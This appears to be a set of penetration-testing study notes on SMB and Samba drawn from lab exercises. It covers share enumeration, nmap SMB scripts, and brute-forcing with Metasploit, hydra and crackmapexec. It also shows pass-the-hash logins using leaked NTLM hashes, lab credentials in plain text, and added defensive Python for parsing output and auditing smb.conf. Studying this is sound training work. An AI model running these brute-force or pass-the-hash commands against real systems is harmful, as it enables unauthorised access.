# Port 445 - SMB

`Server Message Block` (`SMB`) is a client-server protocol that regulates access to files and entire directories and other network resources such as printers, routers, or interfaces released for the network. Information exchange between different system processes can also be handled based on the SMB protocol. [SMB](https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-smb/f210069c-7086-4dc2-885e-861d837df688) first became available to a broader public, for example, as part of the OS/2 network operating system LAN Manager and LAN Server. Since then, the main application area of the protocol has been the Windows operating system series in particular, whose network services support SMB in a downward-compatible manner - which means that devices with newer editions can easily communicate with devices that have an older Microsoft operating system installed. With the free software project Samba, there is also a solution that enables the use of SMB in Linux and Unix distributions and thus cross-platform communication via SMB.

### Samba

There is an alternative implementation of the SMB server called Samba, which is developed for Unix-based operating systems. Samba implements the Common Internet File System (`CIFS`) network protocol. [CIFS](https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-cifs/934c2faa-54af-4526-ac74-6a24d126724e) is a dialect of SMB, meaning it is a specific implementation of the SMB protocol originally created by Microsoft. This allows Samba to communicate effectively with newer Windows systems. Therefore, it is often referred to as SMB/CIFS.

However, `CIFS` is considered a specific version of the SMB protocol, primarily aligning with `SMB version 1`. When SMB commands are transmitted over Samba to an older NetBIOS service, connections typically occur over TCP ports `137`, `138`, and `139`. In contrast, CIFS operates over TCP port `445` exclusively. There are several versions of SMB, including newer versions like `SMB 2` and `SMB 3`, which offer improvements and are preferred in modern infrastructures, while older versions like `SMB 1` (`CIFS`) are considered outdated but may still be used in specific environments.

| **SMB Version** | **Supported**                       | **Features**                                                           |
| --------------- | ----------------------------------- | ---------------------------------------------------------------------- |
| CIFS            | Windows NT 4.0                      | Communication via NetBIOS interface                                    |
| SMB 1.0         | Windows 2000                        | Direct connection via TCP                                              |
| SMB 2.0         | Windows Vista, Windows Server 2008  | Performance upgrades, improved message signing, caching feature        |
| SMB 2.1         | Windows 7, Windows Server 2008 R2   | Locking mechanisms                                                     |
| SMB 3.0         | Windows 8, Windows Server 2012      | Multichannel connections, end-to-end encryption, remote storage access |
| SMB 3.0.2       | Windows 8.1, Windows Server 2012 R2 |                                                                        |
| SMB 3.1.1       | Windows 10, Windows Server 2016     | Integrity checking, AES-128 encryption                                 |

With version 3, the Samba server gained the ability to be a full member of an Active Directory domain. With version 4, Samba even provides an Active Directory domain controller. It contains several so-called daemons for this purpose, which are Unix background programs. The SMB server daemon (`smbd`) belonging to Samba provides the file and print services together with authentication and authorization, while the NetBIOS message block daemon (`nmbd`) implements NetBIOS name resolution and service announcement (browsing). The SMB service controls these two background programs.

We know that Samba is suitable for both Linux and Windows systems. In a network, each host participates in the same `workgroup`. A workgroup is a group name that identifies an arbitrary collection of computers and their resources on an SMB network. There can be multiple workgroups on the network at any given time. IBM developed an `application programming interface` (`API`) for networking computers called the `Network Basic Input/Output System` (`NetBIOS`). The NetBIOS API provided a blueprint for an application to connect and share data with other computers. In a NetBIOS environment, when a machine goes online, it needs a name, which is done through the so-called `name registration` procedure. Either each host reserves its hostname on the network, or the [NetBIOS Name Server](https://networkencyclopedia.com/netbios-name-server-nbns/) (`NBNS`) is used for this purpose. It also has been enhanced to [Windows Internet Name Service](https://networkencyclopedia.com/windows-internet-name-service-wins/) (`WINS`).

**Restart Samba**

```shell-session
root@samba:~# sudo systemctl restart smbd
```

We can display a list (`-L`) of the server's shares with the `smbclient` command from our host. We use the so-called `null session` (`-N`), which is `anonymous` access without the input of existing users or valid passwords.

**SMBclient - Connecting to the Share**

```shell-session
ammartiger@htb[/htb]$ smbclient -N -L //10.129.14.128

        Sharename       Type      Comment
        ---------       ----      -------
        print$          Disk      Printer Drivers
        home            Disk      INFREIGHT Samba
        dev             Disk      DEVenv
        notes           Disk      CheckIT
        IPC$            IPC       IPC Service (DEVSM)
SMB1 disabled -- no workgroup available
```

We can see from the result that there are five different shares on the Samba server. Of these, `print$` and `IPC$` are included by default in the basic configuration. Since we are interested in the `[notes]` share, let us log in and inspect it using the same client program. If we are not familiar with the client program, we can use the `help` command after a successful login to list all the commands we can execute.

```shell-session
ammartiger@htb[/htb]$ smbclient //10.129.14.128/notes

Enter WORKGROUP\<username>'s password: 
Anonymous login successful
Try "help" to get a list of possible commands.


smb: \> help

?              allinfo        altname        archive        backup         
blocksize      cancel         case_sensitive cd             chmod          
chown          close          del            deltree        dir            
du             echo           exit           get            getfacl        
geteas         hardlink       help           history        iosize         
lcd            link           lock           lowercase      ls             
l              mask           md             mget           mkdir          
more           mput           newer          notify         open           
posix          posix_encrypt  posix_open     posix_mkdir    posix_rmdir    
posix_unlink   posix_whoami   print          prompt         put            
pwd            q              queue          quit           readlink       
rd             recurse        reget          rename         reput          
rm             rmdir          showacls       setea          setmode        
scopy          stat           symlink        tar            tarmode        
timeout        translate      unlock         volume         vuid           
wdel           logon          listconnect    showconnect    tcon           
tdis           tid            utimes         logoff         ..             
!            


smb: \> ls

  .                                   D        0  Wed Sep 22 18:17:51 2021
  ..                                  D        0  Wed Sep 22 12:03:59 2021
  prep-prod.txt                       N       71  Sun Sep 19 15:45:21 2021

                30313412 blocks of size 1024. 16480084 blocks available
```

Once we have discovered interesting files or folders, we can download them using the `get` command. Smbclient also allows us to execute local system commands using an exclamation mark at the beginning (`!<cmd>`) without interrupting the connection.

**Download Files from SMB**

```shell-session
smb: \> get prep-prod.txt 

getting file \prep-prod.txt of size 71 as prep-prod.txt (8,7 KiloBytes/sec) 
(average 8,7 KiloBytes/sec)


smb: \> !ls

prep-prod.txt


smb: \> !cat prep-prod.txt

[] check your code with the templates
[] run code-assessment.py
[] …	
```

From the administrative point of view, we can check these connections using `smbstatus`. Apart from the Samba version, it shows which user is connected, from which host, and to which share. This is especially important once we have entered a subnet (perhaps even an isolated one) that others can still access.

For example, with domain-level security, the samba server acts as a member of a Windows domain. Each domain has at least one domain controller, usually a Windows NT server providing password authentication. This domain controller provides the workgroup with a definitive password server. The domain controllers keep track of users and passwords in their own `NTDS.dit` and `Security Authentication Module` (`SAM`) and authenticate each user when they log in for the first time and wish to access another machine's share.

### SMBCLIENT

`smbclient -L` (to list all shares)

<figure><img src="/files/V8zSOcZPiMvWk1rs26pa" alt=""><figcaption></figcaption></figure>

`smbclient //share` (to access it)

{% hint style="info" %}
The `cat` command does not work inside smbclient; use `more` or `less` instead.

Use the `get` command to download files.
{% endhint %}

Use smbclient to determine whether an anonymous connection (null session) is allowed on the Samba server.

```
┌──(root㉿INE)-[~]
└─# smbclient -L demo.ine.local -N                                                                                                                                                         

        Sharename       Type      Comment
        ---------       ----      -------
        public          Disk      
        john            Disk      
        aisha           Disk      
        emma            Disk      
        everyone        Disk      
        IPC$            IPC       IPC Service (samba.recon.lab)
Reconnecting with SMB1 for workgroup listing.

        Server               Comment
        ---------            -------

        Workgroup            Master
        ---------            -------
        RECONLABS            SAMBA-RECON
```

Anonymous connections are allowed, since the shares are listed without a password being required.
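Both `smbclient -L` transcripts on this page (the HTB one earlier and the INE one just above) answer the same question: did the null session return a share list, and which of those shares go beyond the default `print$`/`IPC$`? The following is an added example, not code from the page or from the Samba project: a Python parser for `smbclient -L` output that extracts the share, server and workgroup tables and decides whether the anonymous listing succeeded. The two listings are copied from this page's transcripts; the access-denied response is a constructed sample of the error smbclient prints when the server rejects the null session.

```python
import re
from typing import Dict, List

# Sample output copied from the smbclient -N -L transcript earlier on this page.
HTB_LISTING = """\
        Sharename       Type      Comment
        ---------       ----      -------
        print$          Disk      Printer Drivers
        home            Disk      INFREIGHT Samba
        dev             Disk      DEVenv
        notes           Disk      CheckIT
        IPC$            IPC       IPC Service (DEVSM)
SMB1 disabled -- no workgroup available
"""

# Sample output copied from the INE transcript (smbclient -L demo.ine.local -N).
INE_LISTING = """\
        Sharename       Type      Comment
        ---------       ----      -------
        public          Disk
        john            Disk
        aisha           Disk
        emma            Disk
        everyone        Disk
        IPC$            IPC       IPC Service (samba.recon.lab)
Reconnecting with SMB1 for workgroup listing.

        Server               Comment
        ---------            -------

        Workgroup            Master
        ---------            -------
        RECONLABS            SAMBA-RECON
"""

# Constructed sample: the response of a server that refuses null sessions.
DENIED_LISTING = "session setup failed: NT_STATUS_ACCESS_DENIED\n"

# Shares the page's Samba servers expose by default; anything else is worth a look.
DEFAULT_SHARES = {"IPC$", "print$"}

TABLE_HEADERS = {
    "shares": r"Sharename\s+Type\s+Comment",
    "servers": r"Server\s+Comment",
    "workgroups": r"Workgroup\s+Master",
}


def parse_smbclient_list(output: str) -> Dict[str, List[Dict[str, str]]]:
    """Parse the three tables smbclient -L prints: shares, servers, workgroups.

    Table rows are indented; status lines ("SMB1 disabled ...", "Reconnecting ...")
    start at column 0 and a blank line ends the current table.
    """
    result: Dict[str, List[Dict[str, str]]] = {"shares": [], "servers": [], "workgroups": []}
    section = None
    for raw in output.splitlines():
        stripped = raw.strip()
        if not stripped:
            section = None
            continue
        header = next((n for n, pat in TABLE_HEADERS.items() if re.fullmatch(pat, stripped)), None)
        if header:
            section = header
            continue
        if set(stripped) <= {"-", " "}:      # dashed separator row under the header
            continue
        if section is None or not raw[0].isspace():
            section = None                   # status line, not a table row
            continue
        parts = stripped.split()
        if section == "shares":
            result["shares"].append({"name": parts[0],
                                     "type": parts[1] if len(parts) > 1 else "",
                                     "comment": " ".join(parts[2:])})
        elif section == "servers":
            result["servers"].append({"name": parts[0], "comment": " ".join(parts[1:])})
        else:
            result["workgroups"].append({"name": parts[0], "master": " ".join(parts[1:])})
    return result


def null_session_allowed(output: str) -> bool:
    """True when the unauthenticated listing returned at least one share."""
    if re.search(r"NT_STATUS_(ACCESS_DENIED|LOGON_FAILURE)", output):
        return False
    return bool(parse_smbclient_list(output)["shares"])


def non_default_shares(output: str) -> List[str]:
    """Shares visible to the null session beyond the default print$ and IPC$."""
    return [s["name"] for s in parse_smbclient_list(output)["shares"]
            if s["name"] not in DEFAULT_SHARES]


if __name__ == "__main__":
    for label, listing in (("HTB", HTB_LISTING), ("INE", INE_LISTING), ("denied", DENIED_LISTING)):
        print(label, "null session:", null_session_allowed(listing),
              "non-default shares:", non_default_shares(listing))
```

The parser deliberately keys on the table headers rather than on column positions, so it also copes with the workgroup table that only appears when the server still answers an SMB1 browse request.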

### SMBMAP

```
smbmap -H <IP> [-P <PORT>] #Null user
smbmap -u "username" -p "password" -H <IP> [-P <PORT>] #Creds
smbmap -u "username" -p "<NT>:<LM>" -H <IP> [-P <PORT>] #Pass-the-Hash
smbmap -R -u "username" -p "password" -H <IP> [-P <PORT>] #Recursive list
```

The tool has been updated and it was not working, so I had to git clone it from the main GitHub page.

```
┌──(kali㉿kali)-[~/Desktop/smbmap/smbmap]
└─$ python3 ./smbmap.py -H 10.10.10.100

    ________  ___      ___  _______   ___      ___       __         _______
   /"       )|"  \    /"  ||   _  "\ |"  \    /"  |     /""\       |   __ "\
  (:   \___/  \   \  //   |(. |_)  :) \   \  //   |    /    \      (. |__) :)
   \___  \    /\  \/.    ||:     \/   /\   \/.    |   /' /\  \     |:  ____/
    __/  \   |: \.        |(|  _  \  |: \.        |  //  __'  \    (|  /
   /" \   :) |.  \    /:  ||: |_)  :)|.  \    /:  | /   /  \   \  /|__/ \
  (_______/  |___|\__/|___|(_______/ |___|\__/|___|(___/    \___)(_______)
 -----------------------------------------------------------------------------
     SMBMap - Samba Share Enumerator | Shawn Evans - ShawnDEvans@gmail.com
                     https://github.com/ShawnDEvans/smbmap

[*] Detected 1 hosts serving SMB
[*] Established 1 SMB session(s)                                
                                                                                                    
[+] IP: 10.10.10.100:445        Name: 10.10.10.100        
        Disk                                                    Permissions     Comment
        ----                                                    -----------     -------
        ADMIN$                                                  NO ACCESS       Remote Admin
        C$                                                      NO ACCESS       Default share
        IPC$                                                    NO ACCESS       Remote IPC
        NETLOGON                                                NO ACCESS       Logon server share 
        Replication                                             READ ONLY
        SYSVOL                                                  NO ACCESS       Logon server share 
        Users                                                   NO ACCESS

```

We can use smbmap to list files recursively, which helps when a share contains many files.

```
┌──(kali㉿kali)-[~/Desktop/smbmap/smbmap]
└─$ python3 ./smbmap.py -H 10.10.10.100 -r --depth 10

    ________  ___      ___  _______   ___      ___       __         _______
   /"       )|"  \    /"  ||   _  "\ |"  \    /"  |     /""\       |   __ "\
  (:   \___/  \   \  //   |(. |_)  :) \   \  //   |    /    \      (. |__) :)
   \___  \    /\  \/.    ||:     \/   /\   \/.    |   /' /\  \     |:  ____/
    __/  \   |: \.        |(|  _  \  |: \.        |  //  __'  \    (|  /
   /" \   :) |.  \    /:  ||: |_)  :)|.  \    /:  | /   /  \   \  /|__/ \
  (_______/  |___|\__/|___|(_______/ |___|\__/|___|(___/    \___)(_______)
 -----------------------------------------------------------------------------
     SMBMap - Samba Share Enumerator | Shawn Evans - ShawnDEvans@gmail.com
                     https://github.com/ShawnDEvans/smbmap

[*] Detected 1 hosts serving SMB
[*] Established 1 SMB session(s)                                
                                                                                                    
[+] IP: 10.10.10.100:445        Name: 10.10.10.100        
        Disk                                                    Permissions     Comment
        ----                                                    -----------     -------
        ADMIN$                                                  NO ACCESS       Remote Admin
        C$                                                      NO ACCESS       Default share
        IPC$                                                    NO ACCESS       Remote IPC
        NETLOGON                                                NO ACCESS       Logon server share 
        Replication                                             READ ONLY
        ./Replication
        dr--r--r--                0 Sat Jul 21 06:37:44 2018    .
        dr--r--r--                0 Sat Jul 21 06:37:44 2018    ..
        dr--r--r--                0 Sat Jul 21 06:37:44 2018    active.htb
  
```

We can use the `-A` flag to match a file name pattern and download the matching file.

```
┌──(kali㉿kali)-[~/Desktop/smbmap/smbmap]
└─$ python3 ./smbmap.py -H 10.10.10.100 -r --depth 10 -A Groups.xml                                                                                         

    ________  ___      ___  _______   ___      ___       __         _______
   /"       )|"  \    /"  ||   _  "\ |"  \    /"  |     /""\       |   __ "\
  (:   \___/  \   \  //   |(. |_)  :) \   \  //   |    /    \      (. |__) :)
   \___  \    /\  \/.    ||:     \/   /\   \/.    |   /' /\  \     |:  ____/
    __/  \   |: \.        |(|  _  \  |: \.        |  //  __'  \    (|  /
   /" \   :) |.  \    /:  ||: |_)  :)|.  \    /:  | /   /  \   \  /|__/ \
  (_______/  |___|\__/|___|(_______/ |___|\__/|___|(___/    \___)(_______)
 -----------------------------------------------------------------------------
     SMBMap - Samba Share Enumerator | Shawn Evans - ShawnDEvans@gmail.com
                     https://github.com/ShawnDEvans/smbmap

[*] Detected 1 hosts serving SMB
[*] Established 1 SMB session(s)                                
[*] Performing file name pattern match!                         
[+] Match found! Downloading: Replication/active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Preferences/Groups/Groups.xml
[+] Starting download: Replication\active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\Groups.xml (533 bytes)
[+] File output to: /home/kali/Desktop/smbmap/smbmap/10.10.10.100-Replication_active.htb_Policies_{31B2F340-016D-11D2-945F-00C04FB984F9}_MACHINE_Preferences_Groups_Groups.xml

```

```
smbmap -H demo.ine.local -u admin -p password1
```

<figure><img src="/files/xDT801YgInmxKOvcZBX9" alt=""><figcaption></figcaption></figure>

### Netview

The `net view` command is used to list all resources shared by the target.

```
net view 10.0.28.125
```

<figure><img src="/files/7Ft4PUuyn9xRiptqnIxt" alt=""><figcaption></figcaption></figure>

We can map the shared drive to the demo.ine.local machine using the `net use` command.

Let's map the shared resources, i.e., the Documents and K drive.

```
net use D: \\10.0.28.125\Documents
net use K: \\10.0.28.125\K$
```

<figure><img src="https://assets.ine.com/lab/learningpath/e1e507f4167540dcfa27c5204c55e87e80a12c1f4c6cfa7579ff6adebc55c212.jpg" alt=""><figcaption></figcaption></figure>

We successfully mapped the resources to D and K drives.

Let's check what is inside these mapped drives.

```
dir D:
dir K:
```

<figure><img src="https://assets.ine.com/lab/learningpath/b24cfdea5e3e8936649a596c0397482f6f718022d948b82308d78094f0c54ba9.jpg" alt=""><figcaption></figcaption></figure>

Now that we can browse the shares' contents, we can download or read them on the attacker's machine.

### Enum4linux

Enumerate everything (`-a`):

```
enum4linux -a 192.168.18.110
```

### Nmap Enumeration

```
sudo nmap --script smb-os-discovery.nse 192.168.18.110
nmap -p 445 --script=smb-enum-shares.nse,smb-enum-users.nse 10.10.184.162
nmap --script smb-enum-users.nse 192.168.88.25
```

#### List the supported protocols and dialects of an SMB server

```
┌──(root㉿INE)-[~]
└─# nmap -p445 --script smb-protocols demo.ine.local
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-11-04 20:41 IST
Nmap scan report for demo.ine.local (10.5.22.188)
Host is up (0.0021s latency).

PORT    STATE SERVICE
445/tcp open  microsoft-ds

Host script results:
| smb-protocols: 
|   dialects: 
|     NT LM 0.12 (SMBv1) [dangerous, but default]
|     2:0:2
|     2:1:0
|     3:0:0
|_    3:0:2
```

#### SMB security level

```
┌──(root㉿INE)-[~]
└─# nmap -p445 --script smb-security-mode demo.ine.local
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-11-04 20:43 IST
Nmap scan report for demo.ine.local (10.5.22.188)
Host is up (0.0023s latency).

PORT    STATE SERVICE
445/tcp open  microsoft-ds

Host script results:
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)

Nmap done: 1 IP address (1 host up) scanned in 1.17 seconds
```

#### Logged in users

```
┌──(root㉿INE)-[~]
└─# nmap -p445 --script smb-enum-sessions demo.ine.local                                                                                                                                   
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-11-04 20:46 IST
Nmap scan report for demo.ine.local (10.5.22.188)
Host is up (0.0023s latency).

PORT    STATE SERVICE
445/tcp open  microsoft-ds

Host script results:
| smb-enum-sessions: 
|   Users logged in
|_    WIN-OMCNBKR66MN\bob since <unknown>

Nmap done: 1 IP address (1 host up) scanned in 3.52 seconds
```

This is possible because the target machine is configured with guest login enabled, which is a misconfiguration.

If guest login is not enabled, we can always use valid credentials for the target machine to discover the same information:

```
nmap -p445 --script smb-enum-sessions --script-args smbusername=administrator,smbpassword=smbserver_771 demo.ine.local 
```
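The three nmap results above (an SMBv1 dialect on offer, message signing disabled, and a guest account that can enumerate sessions) each correspond to a handful of server settings. On a Samba server those live in `smb.conf`. The block below is an added example, not from the page or the Samba project: a small Python audit that parses `smb.conf` and reports the settings behind those findings, run against a constructed weak fragment and its hardened counterpart. The parameter names (`server min protocol`, `server signing`, `map to guest`, `restrict anonymous`, `null passwords`, `guest ok`) are real Samba options; the share name, workgroup and values are made up.

```python
import re
from typing import Dict, List

# Constructed smb.conf fragment (not from the page): reproduces the weak state
# the nmap scripts above report on a Samba host.
WEAK_CONF = """\
[global]
   workgroup = DEVOPS
   server string = DEVSM
   server min protocol = NT1
   server signing = disabled
   map to guest = Bad User
   restrict anonymous = 0

[notes]
   path = /mnt/notes
   browseable = yes
   guest ok = yes
   read only = no
"""

# Constructed hardened counterpart: SMB2+ only, signing required, no guest fallback.
HARDENED_CONF = """\
[global]
   workgroup = DEVOPS
   server string = DEVSM
   server min protocol = SMB3_00
   server signing = mandatory
   map to guest = Never
   restrict anonymous = 2
   null passwords = no

[notes]
   path = /mnt/notes
   browseable = yes
   guest ok = no
   valid users = @devops
   read only = yes
"""

SMB1_DIALECTS = {"core", "coreplus", "lanman1", "lanman2", "nt1"}
TRUE_VALUES = {"yes", "true", "1"}


def _key(name: str) -> str:
    # Samba treats parameter names case-insensitively and ignores whitespace in them.
    return re.sub(r"\s+", "", name).lower()


def parse_smb_conf(text: str) -> Dict[str, Dict[str, str]]:
    """Minimal smb.conf reader: {section: {normalised key: value}}."""
    sections: Dict[str, Dict[str, str]] = {}
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line[0] in "#;":
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1].strip().lower()
            sections[current] = {}
        elif current is not None and "=" in line:
            key, value = line.split("=", 1)
            sections[current][_key(key)] = value.strip()
    return sections


def audit_smb_conf(text: str) -> List[str]:
    """One finding per setting that produces the weaknesses seen in the nmap output."""
    conf = parse_smb_conf(text)
    g = conf.get("global", {})
    findings: List[str] = []

    min_proto = g.get("serverminprotocol", "").lower()
    if not min_proto:
        findings.append("server min protocol unset: set SMB2_02 or higher explicitly "
                        "(Samba before 4.11 defaults to NT1, i.e. SMBv1)")
    elif min_proto in SMB1_DIALECTS:
        findings.append(f"server min protocol = {min_proto}: SMBv1 dialects offered")

    signing = g.get("serversigning", "default").lower()
    if signing != "mandatory":
        findings.append(f"server signing = {signing}: message signing not explicitly required")

    guest = g.get("maptoguest", "never").lower()
    if guest != "never":
        findings.append(f"map to guest = {guest}: failed logons fall back to the guest account")

    if g.get("restrictanonymous", "0") != "2":
        findings.append("restrict anonymous != 2: anonymous (null session) access to IPC$ allowed")

    if g.get("nullpasswords", "no").lower() in TRUE_VALUES:
        findings.append("null passwords = yes: accounts with empty passwords may log on")

    for name, opts in conf.items():
        if name == "global":
            continue
        if opts.get("guestok", opts.get("public", "no")).lower() in TRUE_VALUES:
            findings.append(f"[{name}] guest ok = yes: share accessible without credentials")
    return findings


if __name__ == "__main__":
    for label, conf in (("weak", WEAK_CONF), ("hardened", HARDENED_CONF)):
        print(label, audit_smb_conf(conf) or "no findings")
```

Two caveats when acting on the findings: `server signing = default` already means mandatory when Samba runs as an AD domain controller, and `restrict anonymous = 2` also blocks the anonymous IPC$ connection that some older clients and workgroup browsing rely on, so test it before rolling it out. On a Windows file server the same three points are handled by `Set-SmbServerConfiguration` (`-EnableSMB1Protocol $false`, `-RequireSecuritySignature $true`) and by disabling the Guest account.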

#### Enumerating shares

```
nmap -p445 --script smb-enum-shares demo.ine.local
```

Scan all shares with valid credentials to check their permissions:

```
┌──(root㉿INE)-[~]
└─# nmap -p445 --script smb-enum-shares --script-args smbusername=administrator,smbpassword=smbserver_771 demo.ine.local                                                                   
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-11-04 20:51 IST
Nmap scan report for demo.ine.local (10.5.22.188)
Host is up (0.0025s latency).

PORT    STATE SERVICE
445/tcp open  microsoft-ds

Host script results:
| smb-enum-shares: 
|   account_used: administrator
|   \\10.5.22.188\ADMIN$: 
|     Type: STYPE_DISKTREE_HIDDEN
|     Comment: Remote Admin
|     Users: 0
|     Max Users: <unlimited>
|     Path: C:\Windows
|     Anonymous access: <none>
|     Current user access: READ/WRITE
|   \\10.5.22.188\C: 
|     Type: STYPE_DISKTREE
|     Comment: 
|     Users: 0
|     Max Users: <unlimited>
|     Path: C:\
|     Anonymous access: <none>
|     Current user access: READ
|   \\10.5.22.188\C$: 
|     Type: STYPE_DISKTREE_HIDDEN
|     Comment: Default share
|     Users: 0
|     Max Users: <unlimited>
|     Path: C:\
|     Anonymous access: <none>
|     Current user access: READ/WRITE

```

#### Enumerating Users

```
nmap -p445 --script smb-enum-users --script-args smbusername=administrator,smbpassword=smbserver_771 demo.ine.local
```

#### Server statistics

```
┌──(root㉿INE)-[~]
└─# nmap -p445 --script smb-server-stats --script-args smbusername=administrator,smbpassword=smbserver_771 demo.ine.local                                                                  
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-11-04 20:54 IST
Nmap scan report for demo.ine.local (10.5.22.188)
Host is up (0.0021s latency).

PORT    STATE SERVICE
445/tcp open  microsoft-ds

Host script results:
| smb-server-stats: 
|   Server statistics collected since 2025-11-04T15:06:31 (18m24s):
|     59668 bytes (54.05 b/s) sent, 51959 bytes (47.06 b/s) received
|_    17 failed logins, 3 permission errors, 0 system errors, 0 print jobs, 26 files opened

Nmap done: 1 IP address (1 host up) scanned in 1.16 seconds
```

#### Enumerating available domains

```
nmap -p445 --script smb-enum-domains --script-args smbusername=administrator,smbpassword=smbserver_771 demo.ine.local
```

#### Enumerating available user groups

```
nmap -p445 --script smb-enum-groups --script-args smbusername=administrator,smbpassword=smbserver_771 demo.ine.local
```

#### Enumerating services

```
nmap -p445 --script smb-enum-services --script-args smbusername=administrator,smbpassword=smbserver_771 demo.ine.local
```

#### Enumerating all shared folders and drives, then listing their contents with smb-ls

```
nmap -p445 --script smb-enum-shares,smb-ls --script-args smbusername=administrator,smbpassword=smbserver_771 demo.ine.local
```

### SMB Version with Metasploit

The nmap scan does not reveal the exact version of Samba running on the target, so we need a Metasploit module to identify this information.

We need to start the Metasploit Framework console (`msfconsole`) in order to use this module, which can be done by running the following command:

```
msfconsole
```

We can now load the module by running the following command:

```
use auxiliary/scanner/smb/smb_version
```

After loading the module, we need to configure its options; specifically, we need to set the target.

```
set RHOSTS demo.ine.local
```

We can now run the module by running the following command:

```
run
```

<figure><img src="https://assets.ine.com/lab/learningpath/a21ccf5fff3ef266e0b6488b6d3aeb53d0d94ccac128196ecf61931c59e9054c.jpg" alt=""><figcaption></figcaption></figure>

As shown in the above screenshot, the module identifies the version of Samba as **samba 3.0.20**.

### SMB bruteforcing with Metasploit

```
auxiliary/scanner/smb/smb_login
```

```
msfconsole -q
use auxiliary/scanner/smb/smb_login
set USER_FILE /usr/share/metasploit-framework/data/wordlists/common_users.txt
set PASS_FILE /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt
set RHOSTS demo.ine.local
set VERBOSE false
exploit
```

<figure><img src="/files/Qg9ioQebLOSgZP1CYewk" alt=""><figcaption></figcaption></figure>

### SMB bruteforcing with hydra

```
hydra -L /usr/share/metasploit-framework/data/wordlists/common_users.txt -P /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt smb://target2.ine.local
```

### SMB Bruteforcing with crackmapexec

```
crackmapexec smb target.ine.local -u tom -p /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt
```

### Using the NTLM hash list to connect to a target

In the previous step, we discovered **leaked-hashes.txt**, which contains NTLM hashes.

<figure><img src="/files/8qiXZhrEQahI6jM3S0Ib" alt=""><figcaption></figcaption></figure>

Since the question asks us to compromise the **Nancy** user, we can use the **Metasploit** module `scanner/smb/smb_login` to attempt authentication using the leaked NTLM hash.

First, type `options` to list the required options for the module.

<figure><img src="https://miro.medium.com/v2/resize:fit:700/1*TLwaTE1zJZUxv4bYuch14Q.png" alt="" height="296" width="700"><figcaption></figcaption></figure>

Now, set the following options for the **Metasploit** module `scanner/smb/smb_login`:

**RHOSTS**: Set the target IP address or hostname which is `target.ine.local` .

**PASS\_FILE**: Set the path to the file containing the NTLM hashes, which is `leaked-hashes.txt`.

**SMBUser**: Set the SMB username, which is `nancy`.

<figure><img src="https://miro.medium.com/v2/resize:fit:700/1*wBkb7TJMJ5F8Smron6mUHg.png" alt="" height="87" width="700"><figcaption></figcaption></figure>

To create a session upon successful authentication, we need to set **CreateSession** to **true**. Once this is done, we can run the module to attempt compromising the SMB user **Nancy**.

<figure><img src="https://miro.medium.com/v2/resize:fit:700/1*Td0CuF_HR5byAXlM1SB6Hw.png" alt="" height="184" width="700"><figcaption></figcaption></figure>

We have successfully compromised the ‘nancy’ user. To view the active sessions, type the command `sessions`. To interact with the session, use the following command: `sessions 1`.

<figure><img src="https://miro.medium.com/v2/resize:fit:700/1*ivRV7Sdgrgd-0pt637g1aw.png" alt="" height="136" width="700"><figcaption></figcaption></figure>

To list the shares available for the ‘nancy’ user, use the command: `shares`.

<figure><img src="https://miro.medium.com/v2/resize:fit:700/1*IFJYaIc6kSCULUS-3gK71Q.png" alt="" height="214" width="700"><figcaption></figcaption></figure>

We don’t have access to the `HRDocuments` share. Let's connect to the `ITResources` share by using the command: `shares -i ITResources`. Then, use the `ls` command to list the contents of the directory.

<figure><img src="https://miro.medium.com/v2/resize:fit:700/1*zCipkepA0Moi2ZgB0oeu4A.png" alt="" height="130" width="700"><figcaption></figcaption></figure>

To retrieve this flag, use the `download` command. Also download the **hint.txt** file.


<figure><img src="https://miro.medium.com/v2/resize:fit:700/1*RsropFMSJDWxU4l5dQZ-RQ.png" alt="" height="136" width="700"><figcaption></figcaption></figure>

Use the `cat` command to read its contents. This is where we find our second flag, which is:

<figure><img src="https://miro.medium.com/v2/resize:fit:700/1*EvNHvQ3OfzCJsoEvPl0ARA.png" alt="" height="153" width="700"><figcaption></figcaption></figure>

### Checking shares permissions with crackmapexec

```
crackmapexec smb target2.ine.local -u administrator -p pineapple --shares
```

<figure><img src="/files/aEZje3mEbRFcBVvUAQWB" alt=""><figcaption></figcaption></figure>

### Smbget - recursively download files from shares

```
smbget -R smb://10.10.184.162/anonymous
```

### RPCClient

One of the handy tools for SMB enumeration is `rpcclient`, which lets us call MS-RPC functions on the server.

The [Remote Procedure Call](https://www.geeksforgeeks.org/remote-procedure-call-rpc-in-operating-system/) (`RPC`) is a concept and, therefore, also a central tool to realize operational and work-sharing structures in networks and client-server architectures. The communication process via RPC includes passing parameters and the return of a function value.

**RPCclient**

```shell-session
ammartiger@htb[/htb]$ rpcclient -U "" 10.129.14.128

Enter WORKGROUP\'s password:
rpcclient $> 
```

The `rpcclient` offers us many different requests with which we can execute specific functions on the SMB server to get information. A complete list of all these functions can be found on the [man page](https://www.samba.org/samba/docs/current/man-html/rpcclient.1.html) of the rpcclient.

| **Query**                 | **Description**                                                    |
| ------------------------- | ------------------------------------------------------------------ |
| `srvinfo`                 | Server information.                                                |
| `enumdomains`             | Enumerate all domains that are deployed in the network.            |
| `querydominfo`            | Provides domain, server, and user information of deployed domains. |
| `netshareenumall`         | Enumerates all available shares.                                   |
| `netsharegetinfo <share>` | Provides information about a specific share.                       |
| `enumdomusers`            | Enumerates all domain users.                                       |
| `queryuser <RID>`         | Provides information about a specific user.                        |

**RPCclient - Enumeration**

```shell-session
rpcclient $> srvinfo

        DEVSMB         Wk Sv PrQ Unx NT SNT DEVSM
        platform_id     :       500
        os version      :       6.1
        server type     :       0x809a03
		
		
rpcclient $> enumdomains

name:[DEVSMB] idx:[0x0]
name:[Builtin] idx:[0x1]


rpcclient $> querydominfo

Domain:         DEVOPS
Server:         DEVSMB
